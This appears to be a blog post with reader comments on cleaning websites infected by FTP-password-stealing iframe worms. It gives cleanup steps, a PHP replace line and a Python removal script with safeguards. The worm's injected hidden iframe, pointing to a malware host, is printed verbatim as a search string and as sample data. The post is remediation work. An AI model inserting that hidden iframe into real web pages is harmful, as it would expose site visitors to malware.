iframe worms: xtrarobotz.com, superbetfair.cn, lotmachinesguide.cn
I found that a lot of people's sites (Joomla, WordPress, SMF forums, static ones) get infected with these variants of the iframe virus too. They are probably the same family as the goooogleadsence.biz, cutlot.cn, google-ana1yticz.com and mixante.cn worms. You can read about my problems with these worms in one of my previous posts; there is also a bunch of useful comments there. My server antivirus detects them all as exploit.html.iframe-6. As is known, these viruses infect your PC, steal the FTP password saved in FTP programs such as FileZilla, and then inject the iframe into every index file on your server that the stolen account has write access to.
Steps to clean this pest: download the latest antivirus software and clean your PC. NOD32 2.7 with the latest definitions or the free Avast will remove these worms from your PC. Then change all cPanel and user account passwords. After that, restore a clean backup of your public_html files. If your site is too big to restore from backup, there is a removal tool you can download here: iframe worms removal tool.
Thanks to Dragos for this. He left it in a comment on my previous thread about this pest.
Be careful using this script. I destroyed all my .php and .html files with it on one of my sites. First download a copy of your site and try the script on a standalone PHP/MySQL/Apache server (WAMP, LAMP, JSAS). Also, your antivirus may flag this file as a virus, since it contains the line below with the iframe the script is instructed to remove.
You need to locate and change the following line in the script
$data = str_replace ( '<iframe src="http:// mixante .cn/ in.cgi? income53" width=1 height=1 style="visibility: hidden"></iframe>' , "" , $data);
according to the variant you are infected with. The search string must match the injected code exactly, byte for byte, or str_replace will change nothing. If you are infected with multiple variants, change the line and run the script once for each different worm occurrence. You will find the iframe code in your infected index.html and other files, usually just above the </body> tag. Then simply upload the script to your server and open clean.php in your browser. Make a backup first and test it offline or on a copy of your site.
It would be great if someone experienced with PHP could turn this script into a graphical interface with some safety measures, so that you cannot overwrite all of your site's source files with zeros as I did, and then give the code back to the community, since there are thousands of sites infected out there.
As I said, running this script is potentially dangerous. I am not responsible if you destroy your site with it. It worked for me: I removed the worm with this removal tool from my big WordPress, SMF and Joomla sites. Make a backup first and test it offline. Also, do not forget to clean your PC and change your FTP/cPanel passwords, or this pest will come back again. You can also overwrite your infected CMS installations with fresh copies of the current versions, but then you will need to clean your template and personal files manually, so save your configuration files and your customized template files first.
If you have any information about these worms, it would be great if you shared it here.
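The cleanup procedure above, as an added example: this is not the removal tool from the post or Dragos's clean.php, but a stand-alone script written for this page that does the same job with the safeguards the post asks for. It goes a little beyond the single str_replace line: one regex removes the hidden iframe for every worm host named on this page in one pass (add the host you actually find in your own index files to the list), it also eats the line break injected with the iframe so no blank line is left at the top of the file, it refuses to write a file back when nothing was removed or when the result would be empty (the failure mode that wiped the author's files), it keeps a .bak copy, and it swaps the cleaned file in atomically. The host list, the .bak suffix, the scanned extensions and the sample infected page are assumptions and constructed test data, not taken from the tool.

```python
"""Remove hard-coded hidden iframes injected by FTP-credential-stealing worms.

Added example for this page, not the clean.php from the post. The host list,
backup suffix, scanned extensions and sample page below are assumptions.
Run with no arguments to see the constructed sample cleaned; run with a
directory to dry-run over a downloaded copy of a site; add --write to modify.
"""
import os
import re
import sys

# Worm hosts named on the page. Add the host of the variant you actually found;
# the regex only removes iframes that point at one of these hosts.
WORM_HOSTS = [
    "xtrarobotz.com", "superbetfair.cn", "lotmachinesguide.cn",
    "goooogleadsence.biz", "cutlot.cn", "google-ana1yticz.com", "mixante.cn",
]

# File types the worm is known to rewrite (assumed list).
EXTENSIONS = {".php", ".html", ".htm", ".js", ".xml"}


def build_pattern(hosts):
    """Match <iframe ... src=http://HOST/...>...</iframe> for any listed host,
    plus trailing spaces and the line break injected with it."""
    alts = "|".join(re.escape(h) for h in hosts)
    return re.compile(
        r"[ \t]*<iframe\b[^>]*?\bsrc=[\"']?https?://(?:www\.)?(?:%s)[^>]*>"
        r"\s*</iframe>[ \t]*\r?\n?" % alts,
        re.IGNORECASE,
    )


def strip_iframes(text, pattern):
    """Return (cleaned_text, number_of_iframes_removed)."""
    return pattern.subn("", text)


def safe_to_write(original, cleaned, removed):
    """Refuse a rewrite that would wipe a file: nothing was removed, or the
    result is empty while the original was not."""
    if removed == 0:
        return False
    if cleaned.strip() == "" and original.strip() != "":
        return False
    return True


def clean_file(path, pattern, dry_run=True):
    """Clean one file in place, keeping a .bak copy. Returns iframes removed."""
    with open(path, "rb") as fh:
        raw = fh.read()
    original = raw.decode("latin-1")  # byte-transparent, never corrupts content
    cleaned, removed = strip_iframes(original, pattern)
    if not safe_to_write(original, cleaned, removed):
        return 0
    if not dry_run:
        with open(path + ".bak", "wb") as fh:
            fh.write(raw)
        tmp = path + ".tmp"
        with open(tmp, "wb") as fh:
            fh.write(cleaned.encode("latin-1"))
        os.replace(tmp, path)  # atomic swap: no half-written file on failure
    return removed


def clean_tree(root, pattern, dry_run=True):
    """Walk root, clean files with a listed extension, return {path: removed}."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if os.path.splitext(name)[1].lower() in EXTENSIONS:
                path = os.path.join(dirpath, name)
                removed = clean_file(path, pattern, dry_run)
                if removed:
                    results[path] = removed
    return results


# Constructed sample of an infected page, shaped like the line quoted in the post.
SAMPLE_INFECTED = (
    "<html><body>\n<p>Hello</p>\n"
    '<iframe src="http://mixante.cn/in.cgi?income53" width=1 height=1 '
    'style="visibility: hidden"></iframe>\n'
    "</body></html>\n"
)

if __name__ == "__main__":
    pat = build_pattern(WORM_HOSTS)
    if len(sys.argv) < 2:
        print(strip_iframes(SAMPLE_INFECTED, pat)[0])
    else:
        res = clean_tree(sys.argv[1], pat, dry_run="--write" not in sys.argv)
        for path, removed in sorted(res.items()):
            print("%s: %d iframe(s)" % (path, removed))
```

Run it first without --write against a downloaded copy of the site and check the reported paths and counts against what you see in the files; only then run it with --write. It does nothing about iframes hidden behind obfuscated JavaScript, as one commenter below notes, and it does not replace cleaning the PC and rotating the FTP/cPanel passwords, without which the files will be reinfected.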
Same problem
Point is, I don't know where it started?
I deleted it more than 3 times :s
Comment by Hans — April 23, 2009 @ 10:25 am
same problem too
Comment by narcys — May 12, 2009 @ 10:58 am
This kind of removal is senseless. Each worm nests in a completely different way in a website. In many cases the iframe code is encrypted with JavaScript, and the hackers and their worms change their traces constantly. It is hopeless to be a lone warrior against hacking and worms. The only acceptable way I found for me was to always be informed by http://www.hackalert24.com when my website is hacked, so that I can react as fast as possible and restore a backup. Their database is comparable to the virus database of antivirus companies. They are always up to date and make the war against hacking really easier.
Comment by Leo — May 21, 2009 @ 8:49 am
This particular malware is planted on your website because your FTP user ID and password have been stolen. Someone who has FTP access to your server has had malware planted on their box which is giving their user IDs and passwords to a criminal. When he sees he has an FTP user ID and password, he logs in to the site and adds IFRAMEs to web pages there.
To fix this, you must change your FTP user ID and password, and also determine which webmaster has the compromise on their home computer.
Comment by Gary Warner — June 6, 2009 @ 9:30 pm
I just faced this today:
I used your script and got rid of these iframes, thank you very much.
But it left some blank tails in the files; for example, the RSS feed XML docs started with a blank line and did not work, or pages started with a blank line.
But this little plugin solved the issue and fixed my RSS, and my WordPress is fixed, over 320 files. My WP is
back to work:
http://wordpress.org/extend/plugins/fix-rss-feed/
Thank you very much, you saved me.
Comment by kobzeci — June 6, 2009 @ 11:20 pm